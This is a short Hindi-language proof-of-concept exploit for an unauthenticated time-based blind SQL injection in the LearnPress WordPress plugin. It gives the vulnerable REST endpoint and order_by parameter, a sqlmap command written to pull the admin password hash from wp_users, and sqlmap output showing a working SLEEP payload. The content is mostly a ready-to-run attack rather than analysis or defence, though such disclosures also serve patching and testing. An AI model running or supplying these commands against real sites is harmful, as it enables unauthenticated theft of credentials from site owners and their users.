
समय-आधारित ब्लाइंड SQL इंजेक्शन के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो LearnPress WordPress प्लगइन में मौजूद है, जो बिना प्रमाणीकरण के हमलावरों को order_by पैरामीटर के माध्यम से संवेदनशील डेटा निकालने की अनुमति देता है।
समय-आधारित SQLi
विवरण यह प्लगइन SQL स्टेटमेंट में उपयोग करने से पहले order_by पैरामीटर को ठीक से सैनिटाइज़ और एस्केप नहीं करता है, जिससे SQL इंजेक्शन होता है जिसका शोषण बिना प्रमाणीकरण वाले उपयोगकर्ता कर सकते हैं
संवेदनशील GET अनुरोध: https://vulnerablewordpress.com/wp-json/lp/v1/courses/archive-course?c_search=test&order_by=ID&order=DESC&limit=10&return_type=html
GET अनुरोध सहेजें
sqlmap -r ~/sqli.req -p order_by --technique=T --sql-query = 'select user_pass from wp_users where id = 1'
sqlmap ने संग्रहीत सत्र से निम्नलिखित इंजेक्शन बिंदु(ओं) को फिर से शुरू किया:
पैरामीटर: #1* (URI) प्रकार: समय-आधारित ब्लाइंड शीर्षक: MySQL >= 5.0.12 AND समय-आधारित ब्लाइंड (query SLEEP) पेलोड: https://VULNERABLEWORDPRESS/wp-json/lp/v1/courses/archive-course?c_search=test&order_by=ID AND (SELECT 7508 FROM (SELECT(SLEEP(5)))VVvd)&order=DESC&limit=10&return_type=html